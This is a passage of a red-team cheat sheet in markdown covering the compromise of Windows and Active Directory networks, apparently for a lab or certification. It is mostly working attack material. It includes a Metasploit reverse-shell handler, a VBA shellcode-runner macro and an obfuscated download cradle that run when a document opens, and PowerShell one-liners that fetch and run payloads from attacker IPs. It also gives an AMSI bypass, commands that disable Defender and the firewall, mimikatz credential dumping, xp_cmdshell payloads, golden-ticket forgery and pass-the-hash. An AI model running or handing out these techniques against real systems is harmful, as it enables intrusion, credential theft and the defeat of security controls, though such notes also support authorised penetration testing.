Name 117 | ```powershell 118 | convertfrom-sid S-1-5-21-3776646582-2086779273-4091361643-1601 119 | ``` 120 | - Name to SID: 121 | ```powershell 122 | Get-DomainSID -Domain child.red.com 123 | ``` 124 | 125 | ## C2 Preparations 126 | ### Metasploit 127 | ```bash 128 | msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.x.y; set LPORT 443; set ExitOnSession false; run -zj" 129 | ``` 130 | 131 | ## Initial Compromise 132 | ### Word Macro 133 | - VBA Shellcode Runner (x86) 134 | ```vba 135 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr 136 | 137 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 138 | 139 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr 140 | 141 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 142 | 143 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr 144 | 145 | Function mymacro() 146 | 147 | Dim allocRes As LongPtr 148 | 149 | Dim buf As Variant 150 | 151 | Dim addr As LongPtr 152 | 153 | Dim counter As Long 154 | 155 | Dim data As Long 156 | 157 | Dim res As Long 158 | 159 | Dim t1 As Date 160 | 161 | Dim t2 As Date 162 | 163 | Dim time As Long 164 | 165 | allocRes = FlsAlloc(0) 166 | 167 | If IsNull(allocRes) Then 168 | 169 | End 170 | 171 | End If 172 | 173 | t1 = Now() 174 | 175 | Sleep (2000) 176 | 177 | t2 = Now() 178 | 179 | time = DateDiff("s", t1, t2) 180 | 181 | If time < 2 Then 182 | 183 | Exit Function 184 | 185 | End If 186 | 187 | buf = Array(...) 188 | 189 | For i = 0 To UBound(buf) 190 | 191 | buf(i) = buf(i) Xor 188 192 | 193 | Next i 194 | 195 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 196 | 197 | For counter = LBound(buf) To UBound(buf) 198 | 199 | data = buf(counter) 200 | 201 | res = RtlMoveMemory(addr + counter, data, 1) 202 | 203 | Next counter 204 | 205 | res = CreateThread(0, 0, addr, 0, 0, 0) 206 | 207 | End Function 208 | 209 | Sub Document_Open() 210 | 211 | mymacro 212 | 213 | End Sub 214 | 215 | Sub AutoOpen() 216 | 217 | mymacro 218 | 219 | End Sub 220 | ``` 221 | - VBA PowerShell Download Cradle 222 | ```vba 223 | Function MyMacro() 224 | 225 | Dim Apples As String 226 | 227 | Dim Water As String 228 | 229 | If ActiveDocument.Name <> Nuts("...") Then 230 | 231 | Exit Function 232 | 233 | End If 234 | 235 | Apples = "..." 236 | 237 | Water = Nuts(Apples) 238 | 239 | GetObject(Nuts("...")).Get(Nuts("...")).Create Water, Tea, Coffee, Napkin 240 | 241 | End Function 242 | 243 | Function Pears(Beets) 244 | 245 | Pears = Chr(Beets Xor 188) 246 | 247 | End Function 248 | 249 | Function Strawberries(Grapes) 250 | 251 | Strawberries = Left(Grapes, 3) 252 | 253 | End Function 254 | 255 | Function Almonds(Jelly) 256 | 257 | Almonds = Right(Jelly, Len(Jelly) - 3) 258 | 259 | End Function 260 | 261 | Function Nuts(Milk) 262 | 263 | Do 264 | 265 | Oatmilk = Oatmilk + Pears(Strawberries(Milk)) 266 | 267 | Milk = Almonds(Milk) 268 | 269 | Loop While Len(Milk) > 0 270 | 271 | Nuts = Oatmilk 272 | 273 | End Function 274 | 275 | Sub Document_Open() 276 | 277 | MyMacro 278 | 279 | End Sub 280 | 281 | Sub AutoOpen() 282 | 283 | MyMacro 284 | 285 | End Sub 286 | ``` 287 | 288 | ### Phishing 289 | - HTA 290 | - Web Shell 291 | ```csharp 292 | <%@ Page Language="C#" AutoEventWireup="true" %> 293 | 294 | <%@ Import Namespace="System.IO" %> 295 | 296 | <%@ Import Namespace="System.Diagnostics" %> 297 | 298 | <%@ Import Namespace="System.Runtime.InteropServices" %> 299 | 300 | <%@ Import Namespace="System.Net" %> 301 | 302 | <%@ Import Namespace="System.Text" %> 303 | 304 | <%@ Import Namespace="System.Threading" %> 305 | 306 | 393 | ``` 394 | 395 | ### Code Execution 396 | - Cmd 397 | ```powershell 398 | powershell -exec bypass iex (new-object net.webclient).downloadstring('http://192.168.x.y/run.txt') 399 | ``` 400 | 401 | ## Local Reconnaissance On Linux 402 | ### Bash History 403 | 404 | - Check current user's bash history 405 | 406 | - Check every user's bash history after escalating to root 407 | 408 | ### SSH Key 409 | 410 | - id_rsa 411 | 412 | Could in other name such as **bob.key** 413 | 414 | /home/bob/.ssh/id_rsa could be alice's private key 415 | 416 | - known_host (Which you can access) 417 | 418 | Servers that current user's private key can access. Could be hashed 419 | 420 | - authorized_key 421 | 422 | Clients have been connected to this server as current user 423 | 424 | ### Credential in config/text files 425 | 426 | - Config file of web app 427 | 428 | - Credential reuse 429 | 430 | ### Database 431 | 432 | - Stored Credential in table 433 | 434 | - Credential reuse 435 | 436 | ### sudo -l 437 | 438 | - GTFOBins 439 | 440 | ### suid 441 | 442 | - GTFOBins 443 | 444 | ### SSH control master 445 | 446 | A ->B: A has a session on B, piggybacking A's access to B 447 | ``` 448 | ~/.ssh/config or /etc/ssh/ssh_config 449 | ``` 450 | 451 | Any socket file like kevin@web03:22 in `/home/kevin/.ssh/controlmaster` 452 | 453 | `ssh kevin@web03` 454 | 455 | If logged in as root 456 | 457 | `ssh -S /home/alice/.ssh/controlmaster\@alice@web03\:22 alice@web03` 458 | 459 | ### SSH Agent Forwarding 460 | 461 | A -> B -> C: A has a session on B, and A's private key can access to both B and C 462 | 463 | On B to access C 464 | 465 | Normal user 466 | ``` 467 | ssh alice@web03 468 | ``` 469 | Privileged User 470 | ``` 471 | SSH_AUTH_SOCK=/tmp/ssh-xxx ssh-add -l 472 | 473 | SSH_AUTH_SOCK=/tmp/ssh-xxx ssh alice@web03 474 | ``` 475 | ### ccache file 476 | 477 | - Contain request Kerberos tickets 478 | ```bash 479 | /tmp/krb5cc_jack 480 | ``` 481 | - Convert ccache to kirbi file 482 | ```bash 483 | export KRB5CCNAME=/tmp/krb5cc_george 484 | ``` 485 | ### /etc/krb5.keytab 486 | 487 | - Can be used for Kerberos authentication 488 | 489 | ### keytab file 490 | 491 | - Contain Kerberos principle name and encrypted keys 492 | ```bash 493 | /tmp/alice.keytab 494 | 495 | /etc/crontab 496 | 497 | kinit alice@red.com -k -t /tmp/alice.keytab 498 | ``` 499 | ### pspy 500 | 501 | - Hidden cronjobs (Could contain credentials) 502 | 503 | ### /opt/pbis 504 | 505 | - Enumerate domain on Linux 506 | 507 | - Make use of keytab and ccache file 508 | 509 | ### Ansiblebook 510 | 511 | Node hosts: `/etc/ansible/hosts` 512 | 513 | Playbook 514 | 515 | Execute commands on node servers 516 | 517 | Retrieve credentials of node servers from playbook 518 | ```bash 519 | python3 /usr/share/john/ansible2john.py web.yaml 520 | 521 | hashcat hash.txt --force --hash-type=16900 dict/rockyou.txt 522 | 523 | cat pw.txt | ansible-vault decrypt 524 | ``` 525 | Sensitive data 526 | 527 | Playbook contains a command, the command contains plaintext credential. Like mysql.yml 528 | 529 | /var/log/syslog 530 | 531 | ### Jfrog 532 | 533 | Binary Repository Manager 534 | 535 | Port 8082 536 | ``` 537 | ps aux | grep artifactory 538 | ``` 539 | - Check existing files and user interactions like creation, download, etc. 540 | 541 | - Delivery malicious file (With user interaction) 542 | 543 | - Database backup contains credential: ```/opt/jfrog/artifactory/var/backup/access``` 544 | 545 | - Compromise database 546 | 547 | ## Local Reconnaissance On Windows 548 | ### CLM 549 | 550 | - Check CLM 551 | ```powershell 552 | $ExecutionContext.SessionState.LanguageMode 553 | ``` 554 | - Bypass CLM 555 | ```powershell 556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe" 557 | ``` 558 | ### AMSI 559 | 560 | - Check AMSI 561 | ```powershell 562 | 'amsiutils' 563 | ``` 564 | - Disable AMSI 565 | ```powershell 566 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true) 567 | ``` 568 | ### Enumerate Domain 569 | ```powershell 570 | iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1") 571 | Invoke-BloodHound -CollectionMethod All -Verbose 572 | 573 | SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!' 574 | 575 | ipmo .\adpeas.ps1 576 | 577 | Invoke-adPEAS 578 | ``` 579 | ### LAPS 580 | 581 | - Check LAPS 582 | ```powershell 583 | ipmo powerview.ps1 584 | 585 | get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname 586 | 587 | ``` 588 | - Read Password 589 | ```powershell 590 | ipmo powerview.ps1 591 | 592 | get-netcomputer -Filter "(ms-mcs-admpwd=*)" | select dnshostname,ms-mcs-admpwd 593 | ``` 594 | ### AppLocker 595 | 596 | - Check AppLocker 597 | ```powershell 598 | Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe 599 | ``` 600 | - Bypass AppLocker 601 | 602 | ### PPL 603 | 604 | - Check PPL 605 | ```powershell 606 | Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 607 | ``` 608 | - Remove PPL 609 | ```cmd 610 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords"exit 611 | ``` 612 | ### Shutdown AV and Firewall 613 | 614 | - In PowerShell 615 | ```powershell 616 | Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 617 | 618 | netsh advfirewall set allprofiles state off 619 | ``` 620 | - In RDP 621 | 622 | Manually shut down WD. 623 | 624 | ### Local Enumeration 625 | 626 | - whoami /priv 627 | 628 | - Files and Directorys 629 | ``` 630 | C:\program files\ 631 | 632 | C:\program files (x86)\ 633 | 634 | C:\users\bob\document 635 | 636 | C:\users\bob\desktop 637 | 638 | C:\users\bob\.ssh 639 | 640 | C:\program Files\setup\mail.ps1 641 | 642 | C:\inetpub\wwwroot\login.aspx (If web app uses MSSQL) 643 | ``` 644 | - Local Session 645 | 646 | Available tokens of other users/services 647 | 648 | - Vulnerable Service 649 | ```powershell 650 | ipmo .\powerup.ps1 651 | 652 | invoke-allchecks 653 | 654 | sc qc vuln 655 | 656 | sc config vuln start demand //Change start type 657 | 658 | sc config vuln obj "NT AUTHORITY\SYSTEM" //Change owner 659 | 660 | Invoke-serviceabuse -name 'vuln' -username 'red\alice' //Abuse 661 | ``` 662 | 663 | ### SQL Server Instance 664 | 665 | - Instance 666 | ```powershell 667 | get-sqlinstancelocal 668 | 669 | get-sqlinstancedomain 670 | 671 | Get-SQLConnectionTest -Instance "srv-1.red.com,1433" 672 | ``` 673 | - Server Info 674 | ```powershell 675 | get-sqlserverinfo -instance "redsql\sqlexpress" 676 | ``` 677 | - Privilege Enumeration 678 | 679 | Sysadmin logins/users 680 | ```powershell 681 | Get-SQLQuery -Instance 'red.com,1433' -query "select name from master..syslogins where sysadmin=1;" 682 | ``` 683 | User/Login can be impersonated 684 | ```powershell 685 | Get-SQLQuery -Instance 'red.com,1433' -query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';" 686 | ``` 687 | - Linked Servers 688 | 689 | Not all users can see all links 690 | ```powershell 691 | select * from master..sysservers; (SQL Query) 692 | 693 | exec sp_linkedservers; (SQL Query) 694 | 695 | get-sqlserverlinkcrawl -instance "cywebdw\sqlexpress" -username webapp11 -password 89543dfGDFGH4d (PowerUpSQL Query) 696 | 697 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery(""m3sqlw.red.local"",'select * from master..sysservers')" (PowerUpSQL Open Query) 698 | ``` 699 | - Value of xp_cmdshell 700 | ```powershell 701 | select * from sys.configurations where name='xp_cmdshell' (SQL Query) 702 | 703 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from sys.configurations where name ='xp_cmdshell'" (PowerUpSQL Query) 704 | 705 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "select * from openquery (""m3sqlw.red.local"",'select * from sys.configurations where name=''xp_cmdshell''')" (PowerUpSQL OpenQuery) 706 | ``` 707 | - Enable xp_cmdshell 708 | ```powershell 709 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 710 | 711 | exec xp_cmdshell 'whoami'; (SQL Query) 712 | 713 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;EXEC master.dbo.xp_cmdshell 'whoami';" (PowerUpSQL Query) 714 | 715 | get-sqlquery -instance "web06\sqlexpress" -query "exec ('sp_configure ''show advanced options'', 1; reconfigure; exec sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql03; exec('xp_cmdshell ''hostname'';') at SQL03" -username sa -password Passw0rd (1 hop PowerUpSQL Query) 716 | ``` 717 | - xp_cmdshell Meterpreter Shell 718 | ```bash 719 | echo -en 'IEX ((new-object net.webclient).downloadstring("http://10.10.14.111/runner64.txt"))' | iconv -t UTF-16LE | base64 -w 0 (Encode Payload) 720 | 721 | exec xp_cmdshell 'powershell -w hidden -enc <...>' (SQL Query) 722 | 723 | Invoke-SQLOSCmd -Instance "CYWEBDW\SQLEXPRESS" -Command "powershell -w hidden -enc <...> " -RawResults (PowerUpSQL Query 1) 724 | 725 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' ) " (PowerUpSQL Query 2) 726 | 727 | get-sqlquery -instance "CYWEBDW\SQLEXPRESS" -query "EXEC('xp_cmdshell ''powershell -w hidden -enc <...> '' ; ' )AT [m3sqlw.red.local]" (1 hop PowerUpSQL query) 728 | ```` 729 | - Enable Rpcout 730 | ```sql 731 | execute as login='sa'; exec sp_serveroption 'sql03', 'rpc out', 'true'; (SQL Query) 732 | 733 | get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true'" (PowerUpSQL Query) 734 | 735 | get-sqlquery -instance "cywebdb\sqlexpress" -query "execute as login ='sa'; exec (sp_serveroption 'm3sqlw.red.local', 'rpc out', 'true') at [m3sqlw.red.local]" (PowerUpSQL Open Query) 736 | ``` 737 | ### Privilege Escalation is not necessary to be done immediately 738 | 739 | DA or some specific domain users have admin privilege to current host 740 | 741 | ### Password/Hash reuse 742 | 743 | Similar machines could share the same password/hash 744 | 745 | SQL01 and SQL02 746 | 747 | SQL01 and File01 748 | 749 | ## Domain Reconnaissance on Kali 750 | ### BloodHound 751 | ```bash 752 | proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp 753 | ``` 754 | or 755 | ```bash 756 | proxychains bloodhound-python3 -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab) 757 | ``` 758 | ### SMB Access 759 | ```bash 760 | smbmap -H 10.9.20.10 -u kevin -p Passw0rd 761 | ``` 762 | ### WinRM Access 763 | ```bash 764 | crackmapexec winrm 10.9.20.10 -u kevin -p 'Password' 765 | ``` 766 | ### SMB Signing 767 | ```bash 768 | crackmapexec smb 10.9.20.10 769 | ``` 770 | ### User 771 | 772 | - RPCClient 773 | ```bash 774 | proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10 775 | 776 | enumdomusers 777 | 778 | queryuser 0x3601 779 | ``` 780 | - Impacket 781 | ```bash 782 | proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator 783 | ``` 784 | ### Group 785 | 786 | - RPCClient 787 | ```bash 788 | enumdomgroups 789 | 790 | querygroup 0x200 791 | ``` 792 | 793 | ### ASREPoasting 794 | ```bash 795 | python3 impacket/example/GetUserSPNs.py red.com/ -no-pass -dc-ip 10.9.20.10 -userfile users.txt /fomat:hashcat 796 | ``` 797 | ### Kerberoasting 798 | ```bash 799 | python3 impacket/example/GetNPUsers.py red.com/kevin:Passw0rd -dc-ip 10.9.20.10 800 | ``` 801 | ### Overpass the Hash/PTK 802 | ```bash 803 | python3 impacket/example/getTGT.py red.com/kevin:Passw0rd 804 | ``` 805 | 806 | ### Reset AD Password 807 | 808 | - RPCClient 809 | ```bash 810 | setuserinfo2 lawrencecohen 23 'Passw0rd' 811 | ``` 812 | ## Domain Reconnaissance on Windows 813 | ### GPO 814 | 815 | Check GPOs which enable group of users to have remote access (PsExec, WMI, WinRM, RDP, etc) to specific hosts. 816 | 817 | ### Kerberoasting 818 | ```powershell 819 | rubeus.exe kerberoast /user:svc_sql /nowrap 820 | ``` 821 | ### ASREPRoasting 822 | ```powershell 823 | rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap 824 | ``` 825 | ### Unconstrained Delegation 826 | ```powershell 827 | rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap 828 | 829 | Spoolsample.exe reddc redsqlw 830 | 831 | rubeus.exe ptt /ticket:[ticket] 832 | 833 | mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator 834 | ``` 835 | ### Constrained Delegation 836 | ```powershell 837 | rubeus.exe tgtdeleg /nowrap 838 | 839 | rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt 840 | ``` 841 | ### Resource Based Constrained Delegation 842 | ```powershell 843 | ipmo .\powermad.ps1 844 | 845 | New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force) 846 | 847 | ipmo .\Microsoft.ActiveDirectory.Management.dll 848 | 849 | Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose 850 | 851 | rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt 852 | ``` 853 | ### Internal Web Service 854 | 855 | If it is not accessible directly, use SOCKS to access it. 856 | 857 | Any computer/users' name contain "web", "svc", etc. 858 | 859 | Send a phishing email 860 | 861 | Send a document 862 | 863 | Execute command 864 | 865 | Ping a host 866 | 867 | DevOps 868 | 869 | 870 | ### SQL Server 871 | 872 | - Administrative Logins and Users 873 | 874 | sa: Instance Level 875 | 876 | dbo: Database level 877 | 878 | - Database 879 | ```sql 880 | select name from master..sysdatabases; 881 | ``` 882 | - Tables 883 | ```sql 884 | SELECT name FROM master..sysobjects WHERE xtype = ‘U’; 885 | ``` 886 | - Column 887 | ```sql 888 | select name from syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users') 889 | ``` 890 | - User/login 891 | ```sql 892 | select user_name(); //Server Login Name 893 | 894 | select system_user; //Database User Name 895 | 896 | select * from master..syslogins; 897 | ``` 898 | - Change Password 899 | ```sql 900 | ALTER LOGIN webapp WITH PASSWORD = 'Passw0rd'; 901 | ``` 902 | - SQL Admin 903 | ```sql 904 | SELECT IS_SRVROLEMEMBER('sysadmin') 905 | 906 | SELECT NAME from master..syslogins where SYSADMIN=1; 907 | ``` 908 | - Login can be impersonated 909 | ```sql 910 | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; 911 | ``` 912 | - Impersonate Sysadmin 913 | ```sql 914 | EXECUTE AS LOGIN='sa'; 915 | 916 | use msdb; EXECUTE AS USER='dbo'; 917 | ``` 918 | - Create a new Sysadmin 919 | ```sql 920 | exec ('exec sp_addlogin "zys","Passw0rd"') at [sql01]; 921 | 922 | exec ('exec sp_addsrvrolemember "zys","sysadmin"') at [sql01]; 923 | ``` 924 | 925 | - Check link 926 | ```sql 927 | select * from master..sysservers; 928 | 929 | exec sp_linkedservers 930 | ``` 931 | - UNC Path Injection 932 | 933 | ```bash 934 | proxychains python3 impacket/examples/ntlmrelayx.py --no-http-server -smb2support -t 172.16.221.152 -c 935 | 936 | EXEC xp_dirtree '\\192.168.x.y\pwn', 1, 1 937 | 938 | proxychains python3 impacket/examples/psexec.py -hashes :a7a662ffa4744b6393261529aa5004ad administrator@172.16.y.z 939 | 940 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master.dbo.xp_cmdshell 'whoami'; 941 | ``` 942 | - Command Execution 943 | 944 | EXEC 945 | ```sql 946 | EXEC master.dbo.xp_cmdshell 'whoami'; 947 | ``` 948 | Openquery (Blind) 949 | ```sql 950 | Select * From openquery("reddc", 'select @@servername; exec xp_cmdshell ''ping 192.168.x.y'' '); 951 | ``` 952 | 953 | Check Rpcout 954 | ```sql 955 | select srvid,srvname,rpcout from master..sysservers; 956 | ``` 957 | Enable Rpcout 958 | ```sql 959 | exec sp_serveroption 'sql03', 'rpc out', 'true'; 960 | ``` 961 | ### Bidirectional Trust Within a Forest 962 | 963 | ```powershell 964 | mimikatz.exe 965 | 966 | lsadump::dcsync /domain:ops.comply.com /user:ops\krbtgt 967 | 968 | Get-DomainSID -Domain ops.red.com 969 | 970 | Get-DomainSID -Domain red.com 971 | 972 | mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.red.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit" 973 | ``` 974 | 975 | ### Abuse Trust key in bidirectional trust 976 | ```powershell 977 | lsadump::dcsync /domain:child.red.com /user:red$ 978 | 979 | mimikatz kerberos::golden /user:Administrator /domain:child.red.com /sid:S-1-5-21-1675743924-53933031-1918224021 /rc4:51d5b5713a4732047319d02bb9c07c10 /sids:S-1-5-21-3192643952-2658629199-322554960-519 /service:krbtgt /target:red.com /ticket:trust.kirbi 980 | 981 | rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/reddc.red.com /dc:reddc.red.com /ptt 982 | 983 | ls \\reddc.red.com\c$ 984 | ``` 985 | ### Inbound Trust 986 | 987 | ```powershell 988 | dcsync red.com red\administrator 989 | 990 | rubeus.exe asktgt /user:administrator /domain:red.com/aes256:b3d86eabd4895b6cc1ba459490445e0444053c7f24e0ed50cf86d1e1154576c9 /opsec /nowrap 991 | 992 | rubeus.exe asktgs /service:krbtgt/blue.com /domain:red.com /dc:reddc.red/com /ticket:[ticket] /nowrap 993 | 994 | rubeus.exe asktgs /service:cifs/bluedc.blue.com/domain:bluedc.blue.com /dc:bluedc.blue.com /ticket:[ticket] /nowrap 995 | 996 | echo '[ticket]' | grep base64 -d > red.kirbi 997 | 998 | ls \\bluedc.blue.com\c$ 999 | ``` 1000 | ### Bidirectional Trust Between Forests 1001 | 1002 | ```powershell 1003 | mimikatz.exe 1004 | 1005 | lsadump::dcsync /domain:red.com /user:RED\krbtgt 1006 | 1007 | Get-DomainSID -Domain red.com 1008 | 1009 | Get-DomainSID -Domain redteam.com 1010 | 1011 | netdom trust redteam.com /d:red.com /enablesidhistory:yes 1012 | 1013 | Get-DomainGroupMember -Identity "Administrators" -Domain redteam.com 1014 | 1015 | mimikatz.exe "kerberos::golden /user:Administrator /domain:redteam.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-1106 /ptt" "exit" 1016 | ``` 1017 | 1018 | ## Credentials 1019 | ### From File 1020 | ```powershell 1021 | C:\program files\xxx\mail.ps1 1022 | 1023 | C:\inetpub\wwwroot\loginform.aspx 1024 | ``` 1025 | ### Dcsync 1026 | ``` 1027 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit 1028 | ``` 1029 | ### logonpasswords 1030 | ``` 1031 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords"exit 1032 | ``` 1033 | ### SAM 1034 | ``` 1035 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam"exit 1036 | ``` 1037 | ### Secret 1038 | ``` 1039 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::secrets"exit 1040 | ``` 1041 | ### DPAPI 1042 | ``` 1043 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::dpapi"exit 1044 | ``` 1045 | ### SSH Key 1046 | 1047 | - id_rsa: Could be other user's. 1048 | 1049 | - authorized_keys 1050 | 1051 | - known_hosts 1052 | 1053 | ### Ansible 1054 | ``` 1055 | /opt/web.yml 1056 | ``` 1057 | ### Jfrog 1058 | 1059 | ### ccache 1060 | ``` 1061 | /tmp/krb5cc_alice 1062 | ``` 1063 | ### keytab 1064 | 1065 | /etc/krb5.keytab 1066 | 1067 | ## Remote Access 1068 | ### PsExec64 1069 | 1070 | - Local SYSTEM 1071 | ```powershell 1072 | paexec.exe -s -i cmd 1073 | ``` 1074 | - Remote Login 1075 | ```powershell 1076 | paexec.exe -s [\\reddc.red.com](file://reddc.red.com) powershell 1077 | ``` 1078 | 1079 | ### psexec 1080 | ```bash 1081 | python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z 1082 | 1083 | python3 impacket/example/psexec.py -k -no-pass da@reddc.red.com cmd 1084 | ``` 1085 | ### WinRM 1086 | 1087 | ``` 1088 | evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd 1089 | 1090 | evil-winrm -i 192.168.y.z -u kevin -H [hash] 1091 | 1092 | invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"} 1093 | ``` 1094 | 1095 | ### RDP 1096 | 1097 | - Password Authentication 1098 | ``` 1099 | xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore //v:192.168.y.z/dynamic-resolution 1100 | ``` 1101 | - PTH 1102 | ``` 1103 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 1104 | 1105 | xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution 1106 | ``` 1107 | 1108 | ### SSH 1109 | ```bash 1110 | ssh kevin@192.168.y.z 1111 | ``` 1112 | ## Pass the Hash 1113 | 1114 | ### Mimikatz 1115 | ```powershell 1116 | mimikatz.exe "privilege::debug" "sekurlsa::pth /user:kevin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit 1117 | ``` 1118 | ### PsExec 1119 | ```bash 1120 | python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [red/]pete@172.16.90.151 1121 | ``` 1122 | ### WinRM 1123 | ```powershell 1124 | evil-winrm -i 192.168.10.10 -u [red\\]kevin -H 052e763020c5da81d4085a05e69b0f1b 1125 | ``` 1126 | ### WMI 1127 | ```bash 1128 | python3 impacket/examples/wmiexec.py -k --no-pass [red/]zys@10.9.20.10 1129 | ``` 1130 | ### SQL 1131 | ```bash 1132 | python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth red/svc_sql@10.10.20.9 -hashes :052e763020c5da81d4085a05e69b0f1b 1133 | ``` 1134 | ### RDP 1135 | ``` 1136 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 1137 | 1138 | xfreerdp /v:192.168.10.10 /u:user /pth:[hash] /d:corp1.com /dynamic-resolution 1139 | ``` 1140 | or 1141 | ```powershell 1142 | mimikatz.exe 1143 | 1144 | privilege::debug 1145 | 1146 | sekurlsa::pth /user:kevin /domain:red.local /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin" 1147 | ``` 1148 | ## PTK and PTT 1149 | 1150 | ### Preparation 1151 | 1152 | Passed the ticket or ccache. 1153 | 1154 | 1155 | ### PsExec 1156 | ``` 1157 | python3 impacket/example/psexec.py -k -no-pass thomas@dc.red.local cmd 1158 | ``` 1159 | ### WinRM 1160 | ``` 1161 | invoke-command -computername m3webaw.red.local -scriptblock {cmd /c "powershell -ep bypass iex (new-object net.webclient).downloadstring('http://10.10.14.111/run.txt')"} 1162 | ``` 1163 | ### WMI 1164 | ``` 1165 | python3 impacket/examples/wmiexec.py -k --no-pass [red/]alice@10.9.20.10 1166 | ``` 1167 | ### SQL 1168 | ``` 1169 | python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth red/svc_sql@10.10.20.9 -k -no-pass 1170 | ``` 1171 